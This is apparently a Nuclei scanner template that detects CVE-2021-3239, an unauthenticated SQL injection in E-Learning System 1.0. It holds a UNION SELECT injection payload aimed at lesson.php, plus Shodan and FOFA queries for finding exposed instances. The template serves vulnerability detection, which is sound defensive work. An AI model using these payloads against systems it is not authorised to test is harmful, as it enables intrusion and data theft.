E-Learning System 1.0 - SQL Injection

id: CVE-2021-3239

info:
  name: E-Learning System 1.0 - SQL Injection
  author: xuxeong
  severity: critical
  description: |
   E-Learning System 1.0 contains an unauthenticated SQL injection caused by unsanitized input, letting remote attackers execute arbitrary code on the server and gain a reverse shell, exploit requires no authentication.
  impact: |
   Attackers can execute arbitrary code on the server, leading to full system compromise and remote control.
  remediation: |
   Apply input validation and parameterized queries, update to the latest version if available.
  reference:
    - https://www.exploit-db.com/exploits/49434
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3239
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"E-Learning System"
    fofa-query: title="E-Learning System"
  tags: cve,cve2021,sqli,elearning,vuln

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/caiwl/lesson.php?id=-1%20UNION%20SELECT%201,2,md5({{num}}),4,5"
      - "{{BaseURL}}/lesson.php?id=-1%20UNION%20SELECT%201,2,md5({{num}}),4,5"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "c8c605999f3d8352d7bb792cf3fdb25b")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022049b04b82f30ea5febe14df770618af45aff8ce3af4f1abf8e9a5a13719448a530221009cea5e1a098a081dd49c3ea0411aa2846b15f9a967466df9aed9741d18fde3e1:922c64590222798bb761d5b6d8e72950